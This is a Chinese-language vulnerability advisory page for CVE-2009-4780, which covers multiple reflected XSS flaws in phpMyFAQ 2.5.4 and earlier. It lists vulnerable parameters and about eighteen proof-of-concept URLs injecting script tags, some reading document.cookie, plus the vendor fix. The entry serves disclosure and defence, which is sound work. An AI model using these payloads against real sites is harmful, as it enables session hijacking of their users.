phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities

基本字段

漏洞编号：: SSV-86607

披露/发现时间：: 2010-04-21

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2009-4780

CNNVD-ID：: CNNVD-201004-352

CNVD-ID：: CNVD-2010-4807

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者匿名共获得 0KB

## 漏洞信息： phpMyFAQ是一个多语言，完全数据库驱动的FAQ系统。它支持多种数据库来存储所有数据。 phpMyFAQ的脚本index.php中存在多个跨站脚本攻击漏洞。 ## 漏洞影响： ``` phpMyFAQ phpMyFAQ 2.5.4 phpMyFAQ phpMyFAQ 2.5.2 phpMyFAQ phpMyFAQ 2.5.1 phpMyFAQ phpMyFAQ 2.5 -dev phpMyFAQ phpMyFAQ 2.5 ``` ## 漏洞分析： phpMyFAQ没有正确地过滤用户提交给多个页面的变量，远程攻击者可以通过特制的URL请求向页面的输出注入JavaScript代码，导致窃取域Cookie，如会话标识符。这些页面变量包含： (1)sitemap功能中的lang参数； (2)search功能中的search参数； (3)search功能中的tagging_id参数； (4)artikel功能中的highlight参数； (5)artikel功能中的artlang参数； (6)sitemap功能中的letter参数； (7)send2friend功能中的lang参数； (8)show功能中的cat参数； (9)news功能中的newslang参数； (10)send2friend功能中的artlang参数； (11)send2friend功能中的cat参数； (12)send2friend功能中的id参数； (13)translate功能中的srclang参数； (14)translate功能中的id参数； (15)translate功能中的cat参数； (16)add功能中的cat参数； (17)add功能中的question参数。 ``` http://www.example.com/index.php?action=sitemap&lang=en"><script>alert(1)</script> http://www.example.com/index.php?search=hello"><script>alert(document.cookie)</script>&action=search http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script> http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script> http://www.example.com/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script> http://www.example.com/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en http://www.example.com/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1 http://www.example.com/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script> http://www.example.com/index.php?action=search&tagging_id=1"><script>alert(1)</script> http://www.example.com/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script> http://www.example.com/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script> http://www.example.com/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en http://www.example.com/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en http://www.example.com/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script> http://www.example.com/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en http://www.example.com/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en http://www.example.com/index.php?action=add&question=1&cat=1"><script>alert(1)</script> http://www.example.com/index.php?action=add&question=1"><script>alert(1)</script>&cat=1 ``` ## 解决方案：目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.phpmyfaq.de/

共 0 兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 Disorder 共获得 0.2KB

登陆后兑换查看

共 1 兑换

参考链接

http://www.exploit-db.com/exploits/33385

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

2010-04-21 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC
2015-12-28 提交更新了 PoC
2015-12-28 提交更新了 PoC

phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定